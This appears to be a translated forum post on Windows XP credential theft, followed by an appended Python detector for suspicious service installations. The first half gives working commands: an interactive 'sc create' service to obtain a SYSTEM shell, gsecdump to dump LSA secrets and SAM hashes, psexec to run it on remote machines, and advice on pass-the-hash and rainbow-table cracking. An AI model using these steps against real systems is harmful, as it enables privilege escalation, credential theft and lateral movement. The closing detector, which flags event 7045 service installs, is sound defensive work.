To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:
PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A hint: with the iam tool from the pshtools toolkit you can import the hash information just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. Those foreigners really are good; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually never need the password cracked at all; it is just a matter of using the tool. As the original article puts it well: whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to date from /2007/03/16/. Depressing, what a gap.
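From the defender's side, both steps in the post leave the same trace: a service installation (System log event 7045, "A service was installed in the system") whose image is a command shell, whose type asks for desktop interaction, or whose name is the default PsExec service. The following Python, added here as an example and not part of the original post or of any of the tools it names, runs that check over a few constructed records modelled on the 7045 fields. The field names, the sample events and the PSEXESVC name pattern are assumptions for the example; real event parsing (Get-WinEvent, a SIEM) would feed the same `classify` function.

```python
"""Flag service installations that look like the technique in the post above.

Records are constructed samples modelled on the fields of System log event
7045: service name, image path, service type bitmask and service account.
"""
import re

# Service type flags from the Win32 service API.
SERVICE_WIN32_OWN_PROCESS = 0x10
SERVICE_INTERACTIVE_PROCESS = 0x100   # what `sc create ... type= interact` sets

# Shell and script hosts that have no business being a service image.
SHELL_IMAGE_RE = re.compile(r"\\(cmd|powershell|wscript|cscript)\.exe\b",
                            re.IGNORECASE)
# Default service name PsExec installs on the target (assumed for this
# example; a renamed copy will not match and relies on the other rules).
PSEXEC_SERVICE_RE = re.compile(r"^PSEXESVC", re.IGNORECASE)

# Constructed sample events, not real log data.
SAMPLE_EVENTS = [
    {"service_name": "shellcmdline",
     "image_path": r'"C:\WINDOWS\system32\cmd.exe /K start"',
     "service_type": SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
     "account": "LocalSystem"},
    {"service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe",
     "service_type": SERVICE_WIN32_OWN_PROCESS,
     "account": "LocalSystem"},
    {"service_name": "Spooler",                       # benign control case
     "image_path": r"%SystemRoot%\system32\spoolsv.exe",
     "service_type": SERVICE_WIN32_OWN_PROCESS,
     "account": "LocalSystem"},
]


def classify(event):
    """Return the reasons an installation looks suspicious ([] if none)."""
    reasons = []
    if SHELL_IMAGE_RE.search(event["image_path"]):
        reasons.append("service image is a command shell or script host")
    if event["service_type"] & SERVICE_INTERACTIVE_PROCESS:
        reasons.append("service requests interaction with the desktop")
    if PSEXEC_SERVICE_RE.match(event["service_name"]):
        reasons.append("PsExec remote-execution service installed")
    # Only worth noting once something else already fired: most services
    # legitimately run as LocalSystem.
    if reasons and event["account"] == "LocalSystem":
        reasons.append("runs as LocalSystem")
    return reasons


def scan(events):
    """Map each suspicious service name to its list of reasons."""
    return {e["service_name"]: classify(e) for e in events if classify(e)}


if __name__ == "__main__":
    for name, why in scan(SAMPLE_EVENTS).items():
        print(f"{name}: {'; '.join(why)}")
```

The interactive-type rule is the one that catches the post's first step even if the binpath is something other than cmd.exe, and the shell-image rule catches it even when `type= interact` is left off; the PSEXESVC rule only covers an unrenamed PsExec, so an alert on either of the first two should be treated as the stronger signal.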